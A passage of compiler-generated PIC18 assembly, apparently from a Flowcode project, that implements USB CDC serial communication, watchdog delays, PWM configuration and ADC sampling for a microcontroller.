MOVWF CompTempVar2810, 1
MOVF CompTempVar2810, W, 1
ADDWF FSR0L, F
MOVF INDF0, W
MOVWF CompTempVar2811, 1
MOVF usb_ep_get_000A2_arg_buffer+D'1', W, 1
MOVWF FSR0H
MOVF usb_ep_get_000A2_arg_buffer, W, 1
ADDWF usb_ep_get_000A2_1_count, W, 1
MOVWF FSR0L
MOVF CompTempVar2811, W, 1
MOVWF INDF0
INCF usb_ep_get_000A2_1_count, F, 1
BRA label117
label118
MOVF gbl_cdc_rx_start, W, 1
MOVWF gbl_cdc_rx_end, 1
RETURN
; } usb_ep_get_rx_buffer function end
ORG 0x00000AF2
usb_enable_00083
; { usb_enable_module ; function begin
CLRF gbl_uir
BSF gbl_ucon,3
MOVLW 0x01
MOVLB 0x02
MOVWF gbl_usb_state, 1
RETURN
; } usb_enable_module function end
ORG 0x00000AFE
usb_config_000A3
; { usb_configure_structures ; function begin
MOVLW 0x12
MOVWF gbl_my_device_descriptor
MOVLW 0x01
MOVWF gbl_my_device_descriptor+D'1'
MOVLW 0x10
MOVWF gbl_my_device_descriptor+D'2'
MOVLW 0x01
MOVWF gbl_my_device_descriptor+D'3'
MOVLW 0x02
MOVWF gbl_my_device_descriptor+D'4'
CLRF gbl_my_device_descriptor+D'5'
CLRF gbl_my_device_descriptor+D'6'
MOVLW 0x08
MOVWF gbl_my_device_descriptor+D'7'
MOVLW 0xBF
MOVWF gbl_my_device_descriptor+D'8'
MOVLW 0x12
MOVWF gbl_my_device_descriptor+D'9'
MOVLW 0x10
MOVWF gbl_my_device_descriptor+D'10'
MOVLW 0xF0
MOVWF gbl_my_device_descriptor+D'11'
CLRF gbl_my_device_descriptor+D'12'
MOVLW 0x01
MOVWF gbl_my_device_descriptor+D'13'
MOVWF gbl_my_device_descriptor+D'14'
MOVLW 0x02
MOVWF gbl_my_device_descriptor+D'15'
CLRF gbl_my_device_descriptor+D'16'
MOVLW 0x01
MOVWF gbl_my_device_descriptor+D'17'
MOVLW 0x09
MOVLB 0x00
MOVWF gbl_my_config, 1
MOVLW 0x02
MOVWF gbl_my_config+D'1', 1
MOVLW 0x43
MOVWF gbl_my_config+D'2', 1
CLRF gbl_my_config+D'3', 1
MOVLW 0x02
MOVWF gbl_my_config+D'4', 1
MOVLW 0x01
MOVWF gbl_my_config+D'5', 1
CLRF gbl_my_config+D'6', 1
MOVLW 0x80
MOVWF gbl_my_config+D'7', 1
MOVLW 0x64
MOVWF gbl_my_config+D'8', 1
MOVLW 0x09
MOVWF gbl_my_comm_interface, 1
MOVLW 0x04
MOVWF gbl_my_comm_interface+D'1', 1
CLRF gbl_my_comm_interface+D'2', 1
CLRF gbl_my_comm_interface+D'3', 1
MOVLW 0x01
MOVWF gbl_my_comm_interface+D'4', 1
MOVLW 0x02
MOVWF gbl_my_comm_interface+D'5', 1
MOVWF gbl_my_comm_interface+D'6', 1
MOVLW 0x01
MOVWF gbl_my_comm_interface+D'7', 1
CLRF gbl_my_comm_interface+D'8', 1
MOVLW 0x05
MOVWF gbl_my_header
MOVLW 0x24
MOVWF gbl_my_header+D'1'
CLRF gbl_my_header+D'2'
MOVLW 0x10
MOVWF gbl_my_header+D'3'
MOVLW 0x01
MOVWF gbl_my_header+D'4'
MOVLW 0x04
MOVLB 0x02
MOVWF gbl_my_ACM, 1
MOVLW 0x24
MOVWF gbl_my_ACM+D'1', 1
MOVLW 0x02
MOVWF gbl_my_ACM+D'2', 1
MOVWF gbl_my_ACM+D'3', 1
MOVLW 0x05
MOVLB 0x01
MOVWF gbl_my_union, 1
MOVLW 0x24
MOVWF gbl_my_union+D'1', 1
MOVLW 0x06
MOVWF gbl_my_union+D'2', 1
CLRF gbl_my_union+D'3', 1
MOVLW 0x01
MOVWF gbl_my_union+D'4', 1
MOVLW 0x05
MOVWF gbl_my_call_mgt, 1
MOVLW 0x24
MOVWF gbl_my_call_mgt+D'1', 1
MOVLW 0x01
MOVWF gbl_my_call_mgt+D'2', 1
CLRF gbl_my_call_mgt+D'3', 1
MOVLW 0x01
MOVWF gbl_my_call_mgt+D'4', 1
MOVLW 0x07
MOVWF gbl_my_notification_ep, 1
MOVLW 0x05
MOVWF gbl_my_notification_ep+D'1', 1
MOVLW 0x82
MOVWF gbl_my_notification_ep+D'2', 1
MOVLW 0x03
MOVWF gbl_my_notification_ep+D'3', 1
MOVLW 0x08
MOVWF gbl_my_notification_ep+D'4', 1
CLRF gbl_my_notification_ep+D'5', 1
MOVLW 0x02
MOVWF gbl_my_notification_ep+D'6', 1
MOVLW 0x09
MOVWF gbl_my_data_interface, 1
MOVLW 0x04
MOVWF gbl_my_data_interface+D'1', 1
MOVLW 0x01
MOVWF gbl_my_data_interface+D'2', 1
CLRF gbl_my_data_interface+D'3', 1
MOVLW 0x02
MOVWF gbl_my_data_interface+D'4', 1
MOVLW 0x0A
MOVWF gbl_my_data_interface+D'5', 1
CLRF gbl_my_data_interface+D'6', 1
CLRF gbl_my_data_interface+D'7', 1
CLRF gbl_my_data_interface+D'8', 1
MOVLW 0x07
MOVWF gbl_my_data_out_ep, 1
MOVLW 0x05
MOVWF gbl_my_data_out_ep+D'1', 1
MOVLW 0x03
MOVWF gbl_my_data_out_ep+D'2', 1
MOVLW 0x02
MOVWF gbl_my_data_out_ep+D'3', 1
MOVLW 0x08
MOVWF gbl_my_data_out_ep+D'4', 1
CLRF gbl_my_data_out_ep+D'5', 1
CLRF gbl_my_data_out_ep+D'6', 1
MOVLW 0x07
MOVWF gbl_my_data_in_ep, 1
MOVLW 0x05
MOVWF gbl_my_data_in_ep+D'1', 1
MOVLW 0x83
MOVWF gbl_my_data_in_ep+D'2', 1
MOVLW 0x02
MOVWF gbl_my_data_in_ep+D'3', 1
MOVLW 0x08
MOVWF gbl_my_data_in_ep+D'4', 1
CLRF gbl_my_data_in_ep+D'5', 1
CLRF gbl_my_data_in_ep+D'6', 1
MOVLB 0x00
MOVF gbl_my_config+D'8', W, 1
MOVWF gbl_complete_serial_config_00000+D'8'
MOVF gbl_my_config+D'7', W, 1
MOVWF gbl_complete_serial_config_00000+D'7'
MOVF gbl_my_config+D'6', W, 1
MOVWF gbl_complete_serial_config_00000+D'6'
MOVF gbl_my_config+D'5', W, 1
MOVWF gbl_complete_serial_config_00000+D'5'
MOVF gbl_my_config+D'4', W, 1
MOVWF gbl_complete_serial_config_00000+D'4'
MOVF gbl_my_config+D'3', W, 1
MOVWF gbl_complete_serial_config_00000+D'3'
MOVF gbl_my_config+D'2', W, 1
MOVWF gbl_complete_serial_config_00000+D'2'
MOVF gbl_my_config+D'1', W, 1
MOVWF gbl_complete_serial_config_00000+D'1'
MOVF gbl_my_config, W, 1
MOVWF gbl_complete_serial_config_00000
MOVF gbl_my_comm_interface+D'8', W, 1
MOVWF gbl_complete_serial_config_00000+D'17'
MOVF gbl_my_comm_interface+D'7', W, 1
MOVWF gbl_complete_serial_config_00000+D'16'
MOVF gbl_my_comm_interface+D'6', W, 1
MOVWF gbl_complete_serial_config_00000+D'15'
MOVF gbl_my_comm_interface+D'5', W, 1
MOVWF gbl_complete_serial_config_00000+D'14'
MOVF gbl_my_comm_interface+D'4', W, 1
MOVWF gbl_complete_serial_config_00000+D'13'
MOVF gbl_my_comm_interface+D'3', W, 1
MOVWF gbl_complete_serial_config_00000+D'12'
MOVF gbl_my_comm_interface+D'2', W, 1
MOVWF gbl_complete_serial_config_00000+D'11'
MOVF gbl_my_comm_interface+D'1', W, 1
MOVWF gbl_complete_serial_config_00000+D'10'
MOVF gbl_my_comm_interface, W, 1
MOVWF gbl_complete_serial_config_00000+D'9'
MOVF gbl_my_header+D'4', W
MOVWF gbl_complete_serial_config_00000+D'22'
MOVF gbl_my_header+D'3', W
MOVWF gbl_complete_serial_config_00000+D'21'
MOVF gbl_my_header+D'2', W
MOVWF gbl_complete_serial_config_00000+D'20'
MOVF gbl_my_header+D'1', W
MOVWF gbl_complete_serial_config_00000+D'19'
MOVF gbl_my_header, W
MOVWF gbl_complete_serial_config_00000+D'18'
MOVLB 0x02
MOVF gbl_my_ACM+D'3', W, 1
MOVWF gbl_complete_serial_config_00000+D'26'
MOVF gbl_my_ACM+D'2', W, 1
MOVWF gbl_complete_serial_config_00000+D'25'
MOVF gbl_my_ACM+D'1', W, 1
MOVWF gbl_complete_serial_config_00000+D'24'
MOVF gbl_my_ACM, W, 1
MOVWF gbl_complete_serial_config_00000+D'23'
MOVLB 0x01
MOVF gbl_my_union+D'4', W, 1
MOVWF gbl_complete_serial_config_00000+D'31'
MOVF gbl_my_union+D'3', W, 1
MOVWF gbl_complete_serial_config_00000+D'30'
MOVF gbl_my_union+D'2', W, 1
MOVWF gbl_complete_serial_config_00000+D'29'
MOVF gbl_my_union+D'1', W, 1
MOVWF gbl_complete_serial_config_00000+D'28'
MOVF gbl_my_union, W, 1
MOVWF gbl_complete_serial_config_00000+D'27'
MOVF gbl_my_call_mgt+D'4', W, 1
MOVWF gbl_complete_serial_config_00000+D'36'
MOVF gbl_my_call_mgt+D'3', W, 1
MOVWF gbl_complete_serial_config_00000+D'35'
MOVF gbl_my_call_mgt+D'2', W, 1
MOVWF gbl_complete_serial_config_00000+D'34'
MOVF gbl_my_call_mgt+D'1', W, 1
MOVWF gbl_complete_serial_config_00000+D'33'
MOVF gbl_my_call_mgt, W, 1
MOVWF gbl_complete_serial_config_00000+D'32'
MOVF gbl_my_notification_ep+D'6', W, 1
MOVWF gbl_complete_serial_config_00000+D'43'
MOVF gbl_my_notification_ep+D'5', W, 1
MOVWF gbl_complete_serial_config_00000+D'42'
MOVF gbl_my_notification_ep+D'4', W, 1
MOVWF gbl_complete_serial_config_00000+D'41'
MOVF gbl_my_notification_ep+D'3', W, 1
MOVWF gbl_complete_serial_config_00000+D'40'
MOVF gbl_my_notification_ep+D'2', W, 1
MOVWF gbl_complete_serial_config_00000+D'39'
MOVF gbl_my_notification_ep+D'1', W, 1
MOVWF gbl_complete_serial_config_00000+D'38'
MOVF gbl_my_notification_ep, W, 1
MOVWF gbl_complete_serial_config_00000+D'37'
MOVF gbl_my_data_interface+D'8', W, 1
MOVWF gbl_complete_serial_config_00000+D'52'
MOVF gbl_my_data_interface+D'7', W, 1
MOVWF gbl_complete_serial_config_00000+D'51'
MOVF gbl_my_data_interface+D'6', W, 1
MOVWF gbl_complete_serial_config_00000+D'50'
MOVF gbl_my_data_interface+D'5', W, 1
MOVWF gbl_complete_serial_config_00000+D'49'
MOVF gbl_my_data_interface+D'4', W, 1
MOVWF gbl_complete_serial_config_00000+D'48'
MOVF gbl_my_data_interface+D'3', W, 1
MOVWF gbl_complete_serial_config_00000+D'47'
MOVF gbl_my_data_interface+D'2', W, 1
MOVWF gbl_complete_serial_config_00000+D'46'
MOVF gbl_my_data_interface+D'1', W, 1
MOVWF gbl_complete_serial_config_00000+D'45'
MOVF gbl_my_data_interface, W, 1
MOVWF gbl_complete_serial_config_00000+D'44'
MOVF gbl_my_data_out_ep+D'6', W, 1
MOVWF gbl_complete_serial_config_00000+D'59'
MOVF gbl_my_data_out_ep+D'5', W, 1
MOVWF gbl_complete_serial_config_00000+D'58'
MOVF gbl_my_data_out_ep+D'4', W, 1
MOVWF gbl_complete_serial_config_00000+D'57'
MOVF gbl_my_data_out_ep+D'3', W, 1
MOVWF gbl_complete_serial_config_00000+D'56'
MOVF gbl_my_data_out_ep+D'2', W, 1
MOVWF gbl_complete_serial_config_00000+D'55'
MOVF gbl_my_data_out_ep+D'1', W, 1
MOVWF gbl_complete_serial_config_00000+D'54'
MOVF gbl_my_data_out_ep, W, 1
MOVWF gbl_complete_serial_config_00000+D'53'
MOVF gbl_my_data_in_ep+D'6', W, 1
MOVWF gbl_complete_serial_config_00000+D'66'
MOVF gbl_my_data_in_ep+D'5', W, 1
MOVWF gbl_complete_serial_config_00000+D'65'
MOVF gbl_my_data_in_ep+D'4', W, 1
MOVWF gbl_complete_serial_config_00000+D'64'
MOVF gbl_my_data_in_ep+D'3', W, 1
MOVWF gbl_complete_serial_config_00000+D'63'
MOVF gbl_my_data_in_ep+D'2', W, 1
MOVWF gbl_complete_serial_config_00000+D'62'
MOVF gbl_my_data_in_ep+D'1', W, 1
MOVWF gbl_complete_serial_config_00000+D'61'
MOVF gbl_my_data_in_ep, W, 1
MOVWF gbl_complete_serial_config_00000+D'60'
RETURN
; } usb_configure_structures function end
ORG 0x00000D3C
usb_cdc_tx_0009F
; { usb_cdc_tx_empty ; function begin
MOVLB 0x02
CLRF CompTempVarRet2799, 1
MOVF gbl_cdc_tx_end, W, 1
CPFSEQ gbl_cdc_tx_start, 1
RETURN
INCF CompTempVarRet2799, F, 1
RETURN
; } usb_cdc_tx_empty function end
ORG 0x00000D4A
usb_cdc_se_000A1
; { usb_cdc_setup ; function begin
MOVLW HIGH(gbl_class_data+D'0')
MOVLB 0x02
MOVWF usb_cdc_se_000A1_1_my_lc+D'1', 1
MOVLW LOW(gbl_class_data+D'0')
MOVWF usb_cdc_se_000A1_1_my_lc, 1
MOVF usb_cdc_se_000A1_1_my_lc+D'1', W, 1
MOVWF FSR0H
MOVF usb_cdc_se_000A1_1_my_lc, W, 1
MOVWF FSR0L
MOVLW 0x03
ADDWF FSR0L, F
MOVLW 0x00
MOVWF CompTempVar2807, 1
MOVWF CompTempVar2807+D'1', 1
MOVLW 0x09
MOVWF CompTempVar2807+D'2', 1
MOVLW 0x60
MOVWF INDF0
DECF FSR0L, F
MOVF CompTempVar2807+D'2', W, 1
MOVWF INDF0
DECF FSR0L, F
MOVF CompTempVar2807+D'1', W, 1
MOVWF INDF0
DECF FSR0L, F
MOVF CompTempVar2807, W, 1
MOVWF INDF0
MOVF usb_cdc_se_000A1_1_my_lc, W, 1
MOVWF FSR0L
MOVLW 0x04
ADDWF FSR0L, F
MOVLW 0x00
MOVWF INDF0
MOVF usb_cdc_se_000A1_1_my_lc, W, 1
MOVWF FSR0L
MOVLW 0x06
ADDWF FSR0L, F
MOVLW 0x08
MOVWF INDF0
MOVF usb_cdc_se_000A1_1_my_lc, W, 1
MOVWF FSR0L
MOVLW 0x05
ADDWF FSR0L, F
MOVLW 0x00
MOVWF INDF0
RETURN
; } usb_cdc_setup function end
ORG 0x00000DA6
usb_cdc_rx_0009E
; { usb_cdc_rx_avail ; function begin
MOVLB 0x02
MOVF gbl_cdc_rx_start, W, 1
SUBWF gbl_cdc_rx_end, W, 1
MOVWF CompTempVarRet2797, 1
RETURN
; } usb_cdc_rx_avail function end
ORG 0x00000DB0
usb_cdc_pu_0009D
; { usb_cdc_putc ; function begin
INCF gbl_cdc_tx_end, W, 1
MOVWF usb_cdc_pu_0009D_1_cdc_tx_next, 1
MOVLW 0x40
CPFSEQ usb_cdc_pu_0009D_1_cdc_tx_next, 1
BRA label119
CLRF usb_cdc_pu_0009D_1_cdc_tx_next, 1
label119
BTFSC gbl_intcon,7
BRA label120
MOVF gbl_cdc_tx_start, W, 1
CPFSEQ usb_cdc_pu_0009D_1_cdc_tx_next, 1
BRA label120
RETURN
label120
MOVF gbl_cdc_tx_start, W, 1
CPFSEQ usb_cdc_pu_0009D_1_cdc_tx_next, 1
BRA label121
BRA label120
label121
BCF usb_cdc_pu_0009D_1_my_store_gie,0, 1
BTFSC gbl_intcon,7
BSF usb_cdc_pu_0009D_1_my_store_gie,0, 1
label122
BCF gbl_intcon,7
BTFSC gbl_intcon,7
BRA label122
MOVLB 0x00
LFSR 0x00, gbl_cdc_tx_buffer
MOVF FSR0L, W
MOVLB 0x02
MOVF gbl_cdc_tx_end, W, 1
ADDWF FSR0L, F
MOVF usb_cdc_pu_0009D_arg_c, W, 1
MOVWF INDF0
MOVF usb_cdc_pu_0009D_1_cdc_tx_next, W, 1
MOVWF gbl_cdc_tx_end, 1
BTFSC usb_cdc_pu_0009D_1_my_store_gie,0, 1
BSF gbl_intcon,7
BTFSS usb_cdc_pu_0009D_1_my_store_gie,0, 1
BCF gbl_intcon,7
RETURN
; } usb_cdc_putc function end
ORG 0x00000DFC
Wdt_Delay__00036
; { Wdt_Delay_Ms ; function begin
CLRF Wdt_Delay__00036_1_i, 1
label123
MOVF Wdt_Delay__00036_arg_delay, W, 1
CPFSLT Wdt_Delay__00036_1_i, 1
RETURN
CLRWDT
MOVLW 0x01
MOVWF delay_ms_00000_arg_del, 1
CALL delay_ms_00000
INCF Wdt_Delay__00036_1_i, F, 1
BRA label123
; } Wdt_Delay_Ms function end
ORG 0x00000E12
FC_CAL_PWM_00051
; { FC_CAL_PWM_Enable_1 ; function begin
BCF gbl_trisc,5
BCF gbl_portc,5
MOVLW 0xC0
MOVWF gbl_pwm1con
RETURN
; } FC_CAL_PWM_Enable_1 function end
ORG 0x00000E1C
FC_CAL_PWM_0004E
; { FC_CAL_PWM_ChangePeriod_1 ; function begin
MOVF FC_CAL_PWM_0004E_arg_period, W, 1
MOVWF gbl_pr2
MOVLW 0x01
CPFSEQ FC_CAL_PWM_0004E_arg_prescaler, 1
BRA label124
MOVF FC_CAL_PWM_0004E_arg_prescaler+D'1', W, 1
BZ label127
label124
MOVLW 0x04
CPFSEQ FC_CAL_PWM_0004E_arg_prescaler, 1
BRA label125
MOVF FC_CAL_PWM_0004E_arg_prescaler+D'1', W, 1
BZ label128
label125
MOVLW 0x10
CPFSEQ FC_CAL_PWM_0004E_arg_prescaler, 1
BRA label126
MOVF FC_CAL_PWM_0004E_arg_prescaler+D'1', W, 1
BZ label129
label126
MOVLW 0x40
CPFSEQ FC_CAL_PWM_0004E_arg_prescaler, 1
BRA label131
MOVF FC_CAL_PWM_0004E_arg_prescaler+D'1', W, 1
BZ label130
BRA label131
label127
MOVLW 0x04
MOVWF gbl_t2con
RETURN
label128
MOVLW 0x05
MOVWF gbl_t2con
RETURN
label129
MOVLW 0x06
MOVWF gbl_t2con
RETURN
label130
MOVLW 0x07
MOVWF gbl_t2con
RETURN
label131
MOVLW 0x05
MOVWF gbl_t2con
RETURN
; } FC_CAL_PWM_ChangePeriod_1 function end
ORG 0x00000E68
FC_CAL_ADC_0005B
; { FC_CAL_ADC_Sample ; function begin
label132
BTFSC gbl_adcon0,1
BRA label132
MOVF FC_CAL_ADC_0005B_arg_Sample_Mode, F, 1
BZ label133
MOVF gbl_adresh, W
MOVWF FC_CAL_ADC_0005B_1_iRetVal, 1
CLRF FC_CAL_ADC_0005B_1_iRetVal+D'1', 1
RLCF FC_CAL_ADC_0005B_1_iRetVal, F, 1
RLCF FC_CAL_ADC_0005B_1_iRetVal+D'1', F, 1
RLCF FC_CAL_ADC_0005B_1_iRetVal, F, 1
RLCF FC_CAL_ADC_0005B_1_iRetVal+D'1', F, 1
MOVLW 0xFC
ANDWF FC_CAL_ADC_0005B_1_iRetVal, F, 1
RRCF gbl_adresl, W
MOVWF CompTempVar2659, 1
RRCF CompTempVar2659, F, 1
SWAPF CompTempVar2659, F, 1
MOVLW 0x03
ANDWF CompTempVar2659, F, 1
MOVF CompTempVar2659, W, 1
IORWF FC_CAL_ADC_0005B_1_iRetVal, F, 1
MOVF FC_CAL_ADC_0005B_1_iRetVal+D'1', F, 1
BRA label134
label133
MOVF gbl_adresh, W
MOVWF FC_CAL_ADC_0005B_1_iRetVal, 1
CLRF FC_CAL_ADC_0005B_1_iRetVal+D'1', 1
label134
MOVLW 0x02
IORWF gbl_adcon0, W
MOVWF gbl_adcon0
MOVF FC_CAL_ADC_0005B_1_iRetVal, W, 1
MOVWF CompTempVarRet2656, 1
MOVF FC_CAL_ADC_0005B_1_iRetVal+D'1', W, 1
MOVWF CompTempVarRet2656+D'1', 1
RETURN
; } FC_CAL_ADC_Sample function end
ORG 0x00000EAC
FC_CAL_ADC_0005A
; { FC_CAL_ADC_Enable ; function begin
CLRF gbl_adcon1
MOVLW 0x07
CPFSEQ FC_CAL_ADC_0005A_arg_Channel, 1
BRA label135
BRA label136
label135
MOVLW 0x08
CPFSEQ FC_CAL_ADC_0005A_arg_Channel, 1
BRA label138
BRA label137
label136
MOVLW 0x08
MOVWF gbl_tris_mask, 1
MOVLW HIGH(gbl_trisc+D'0')
MOVWF gbl_tris_reg+D'1', 1
MOVLW LOW(gbl_trisc+D'0')
MOVWF gbl_tris_reg, 1
MOVLW 0x80
MOVWF gbl_adcon1
BRA label138
label137
MOVLW 0x40
MOVWF gbl_tris_mask, 1
MOVLW HIGH(gbl_trisc+D'0')
MOVWF CompTempVar2650, 1
MOVLW LOW(gbl_trisc+D'0')
MOVWF gbl_tris_reg, 1
MOVF CompTempVar2650, W, 1
MOVWF gbl_tris_reg+D'1', 1
MOVLW 0x01
MOVWF gbl_anselh
label138
MOVLW 0x07
ANDWF FC_CAL_ADC_0005A_arg_Conv_Speed, W, 1
MOVWF gbl_adcon2
MOVF FC_CAL_ADC_0005A_arg_Vref, F, 1
BZ label139
MOVLW 0x03
ANDWF FC_CAL_ADC_0005A_arg_Vref, W, 1
MOVWF CompTempVar2651, 1
RLCF CompTempVar2651, F, 1
RLCF CompTempVar2651, F, 1
MOVLW 0xFC
ANDWF CompTempVar2651, F, 1
MOVF CompTempVar2651, W, 1
IORWF gbl_adcon1, W
MOVWF gbl_adcon1
label139
MOVF gbl_tris_reg+D'1', W, 1
MOVWF FSR0H
MOVF gbl_tris_reg, W, 1
MOVWF FSR0L
MOVF INDF0, W
MOVWF gbl_old_tris, 1
MOVF gbl_tris_mask, W, 1
IORWF gbl_old_tris, W, 1
MOVWF CompTempVar2653, 1
MOVWF INDF0
MOVF FC_CAL_ADC_0005A_arg_Channel, W, 1
MOVWF CompTempVar2655, 1
RLCF CompTempVar2655, F, 1
RLCF CompTempVar2655, F, 1
MOVLW 0xFC
ANDWF CompTempVar2655, F, 1
MOVF CompTempVar2655, W, 1
IORLW 0x01
MOVWF CompTempVar2654, 1
MOVF CompTempVar2654, W, 1
MOVWF gbl_adcon0
MOVF FC_CAL_ADC_0005A_arg_T_Charge, W, 1
MOVWF delay_us_00000_arg_del, 1
CALL delay_us_00000
MOVLW 0x02
IORWF gbl_adcon0, W
MOVWF gbl_adcon0
RETURN
; } FC_CAL_ADC_Enable function end
ORG 0x00000F3C
FC_CAL_ADC_00059
; { FC_CAL_ADC_Disable ; function begin
MOVLB 0x02
MOVF gbl_tris_reg+D'1', W, 1
MOVWF FSR0H
MOVF gbl_tris_reg, W, 1
MOVWF FSR0L
MOVF gbl_old_tris, W, 1
MOVWF INDF0
CLRF gbl_ansel
CLRF gbl_adcon0
CLRF gbl_anselh
RETURN
; } FC_CAL_ADC_Disable function end
ORG 0x00000F52
FCI_GETLEN_0003D
; { FCI_GETLENGTH ; function begin
CLRF FCI_GETLEN_0003D_1_tmp, 1
label140
MOVF FCI_GETLEN_0003D_arg_iStr1_len, W, 1
CPFSLT FCI_GETLEN_0003D_1_tmp, 1
BRA label141
MOVF FCI_GETLEN_0003D_arg_sStr1+D'1', W, 1
MOVWF FSR0H
MOVF FCI_GETLEN_0003D_arg_sStr1, W, 1
ADDWF FCI_GETLEN_0003D_1_tmp, W, 1
MOVWF FSR0L
MOVF INDF0, F
BZ label141
INCF FCI_GETLEN_0003D_1_tmp, F, 1
BRA label140
label141
MOVF FCI_GETLEN_0003D_1_tmp, W, 1
MOVWF CompTempVarRet1856, 1
RETURN
; } FCI_GETLENGTH function end
ORG 0x00000F72
FCD_0df41__00057
; { FCD_0df41_PWM1__Enable ; function begin
MOVLW 0x01
MOVLB 0x02
MOVWF gbl_FCV_0df41_PWM1__ENABLED, 1
SETF FC_CAL_PWM_0004E_arg_period, 1
CLRF FC_CAL_PWM_0004E_arg_period+D'1', 1
MOVLW 0x01
MOVWF FC_CAL_PWM_0004E_arg_prescaler, 1
CLRF FC_CAL_PWM_0004E_arg_prescaler+D'1', 1
CALL FC_CAL_PWM_0004E
CALL FC_CAL_PWM_00051
RETURN
; } FCD_0df41_PWM1__Enable function end
ORG 0x00000F8C
FCD_08f42__0006A
; { FCD_08f42_adc_base__GetInt ; function begin
MOVLW 0x08
MOVLB 0x02
MOVWF FC_CAL_ADC_0005A_arg_Channel, 1
MOVLW 0x03
MOVWF FC_CAL_ADC_0005A_arg_Conv_Speed, 1
CLRF FC_CAL_ADC_0005A_arg_Vref, 1
MOVLW 0x28
MOVWF FC_CAL_ADC_0005A_arg_T_Charge, 1
CALL FC_CAL_ADC_0005A
MOVLW 0x01
MOVWF FC_CAL_ADC_0005B_arg_Sample_Mode, 1
CALL FC_CAL_ADC_0005B
MOVF CompTempVarRet2656, W, 1
MOVWF FCD_08f42__0006A_1_FCR_RETVAL, 1
MOVF CompTempVarRet2656+D'1', W, 1
MOVWF FCD_08f42__0006A_1_FCR_RETVAL+D'1', 1
CALL FC_CAL_ADC_00059
MOVF FCD_08f42__0006A_1_FCR_RETVAL, W, 1
MOVWF CompTempVarRet2684, 1
MOVF FCD_08f42__0006A_1_FCR_RETVAL+D'1', W, 1
MOVWF CompTempVarRet2684+D'1', 1
RETURN
; } FCD_08f42_adc_base__GetInt function end
ORG 0x00000FBE
FCD_08f41__0007B
; { FCD_08f41_adc_base__GetInt ; function begin
MOVLW 0x07
MOVLB 0x02
MOVWF FC_CAL_ADC_0005A_arg_Channel, 1
MOVLW 0x03
MOVWF FC_CAL_ADC_0005A_arg_Conv_Speed, 1
CLRF FC_CAL_ADC_0005A_arg_Vref, 1
MOVLW 0x28
MOVWF FC_CAL_ADC_0005A_arg_T_Charge, 1
CALL FC_CAL_ADC_0005A
MOVLW 0x01
MOVWF FC_CAL_ADC_0005B_arg_Sample_Mode, 1
CALL FC_CAL_ADC_0005B
MOVF CompTempVarRet2656, W, 1
MOVWF FCD_08f41__0007B_1_FCR_RETVAL, 1
MOVF CompTempVarRet2656+D'1', W, 1
MOVWF FCD_08f41__0007B_1_FCR_RETVAL+D'1', 1
CALL FC_CAL_ADC_00059
MOVF FCD_08f41__0007B_1_FCR_RETVAL, W, 1
MOVWF CompTempVarRet2708, 1
MOVF FCD_08f41__0007B_1_FCR_RETVAL+D'1', W, 1
MOVWF CompTempVarRet2708+D'1', 1
RETURN
; } FCD_08f41_adc_base__GetInt function end
ORG 0x00000FF0
FCD_056e1__000AD
; { FCD_056e1_v5__usbserial0__Initialise ; function begin
MOVLB 0x02
CLRF FCD_056e1__000AD_1_FCL_DEL_000AE, 1
CLRF FCD_056e1__000AD_1_FCL_DEL_000AE+D'1', 1
CALL usb_config_000A3
label142
BCF gbl_intcon,7
BTFSC gbl_intcon,7
BRA label142
CALL usb_cdc_se_000A1
CALL usb_setup_00000
BSF gbl_intcon,6
BSF gbl_intcon,7
CALL usb_enable_00083
label143
MOVF gbl_CDC_USB_status, F, 1
BZ label143
CLRF FCD_056e1__000AD_1_FCR_RETVAL, 1
MOVF FCD_056e1__000AD_1_FCR_RETVAL, W, 1
MOVWF CompTempVarRet2826, 1
RETURN
; } FCD_056e1_v5__usbserial0__Initialise function end
ORG 0x0000101C
FCD_056e1__000AA
; { FCD_056e1_v5__usbserial0__ReadByte ; function begin
CLRF FCD_056e1__000AA_1_FCL_WAI_000AC, 1
SETF FCD_056e1__000AA_1_FCR_RETVAL, 1
CLRF FCD_056e1__000AA_1_FCR_RETVAL+D'1', 1
BTFSC CompGblVar65,0, 1
BRA label144
CLRF FCD_056e1__000AA_1_position, 1
BSF CompGblVar65,0, 1
label144
BTFSC CompGblVar66,1, 1
BRA label145
CLRF FCD_056e1__000AA_1_length, 1
BSF CompGblVar66,1, 1
label145
INCF FCD_056e1__000AA_arg_FCL_T_000AB, W, 1
BNZ label146
MOVLW 0x01
MOVWF FCD_056e1__000AA_1_FCL_WAI_000AC, 1
label146
MOVF FCD_056e1__000AA_1_length, W, 1
CPFSEQ FCD_056e1__000AA_1_position, 1
BRA label151
CLRF FCD_056e1__000AA_1_position, 1
CALL usb_cdc_rx_0009E
MOVF CompTempVarRet2797, W, 1
MOVWF FCD_056e1__000AA_1_length, 1
label147
MOVF FCD_056e1__000AA_1_length, F, 1
BNZ label149
MOVF FCD_056e1__000AA_arg_FCL_T_000AB, F, 1
BNZ label148
MOVF FCD_056e1__000AA_1_FCL_WAI_000AC, F, 1
BZ label149
label148
MOVLW 0x01
MOVWF Wdt_Delay__00036_arg_delay, 1
CALL Wdt_Delay__00036
CALL usb_cdc_rx_0009E
MOVF CompTempVarRet2797, W, 1
MOVWF FCD_056e1__000AA_1_length, 1
DECF FCD_056e1__000AA_arg_FCL_T_000AB, W, 1
MOVWF FCD_056e1__000AA_arg_FCL_T_000AB, 1
BRA label147
label149
MOVF FCD_056e1__000AA_1_length, F, 1
BNZ label150
MOVF FCD_056e1__000AA_1_FCR_RETVAL, W, 1
MOVWF CompTempVarRet2823, 1
MOVF FCD_056e1__000AA_1_FCR_RETVAL+D'1', W, 1
MOVWF CompTempVarRet2823+D'1', 1
RETURN
label150
MOVF FCD_056e1__000AA_1_length, W, 1
MOVWF usb_ep_get_000A2_arg_length, 1
MOVLW HIGH(gbl_CDC_USB_Rx_String+D'0')
MOVWF usb_ep_get_000A2_arg_buffer+D'1', 1
MOVLW LOW(gbl_CDC_USB_Rx_String+D'0')
MOVWF usb_ep_get_000A2_arg_buffer, 1
CALL usb_ep_get_000A2
label151
MOVLB 0x01
LFSR 0x00, gbl_CDC_USB_Rx_String
MOVF FSR0L, W
MOVLB 0x02
MOVF FCD_056e1__000AA_1_position, W, 1
ADDWF FSR0L, F
MOVF INDF0, W
MOVWF FCD_056e1__000AA_1_FCR_RETVAL, 1
CLRF FCD_056e1__000AA_1_FCR_RETVAL+D'1', 1
INCF FCD_056e1__000AA_1_position, W, 1
MOVWF FCD_056e1__000AA_1_position, 1
MOVF FCD_056e1__000AA_1_FCR_RETVAL, W, 1
MOVWF CompTempVarRet2823, 1
MOVF FCD_056e1__000AA_1_FCR_RETVAL+D'1', W, 1
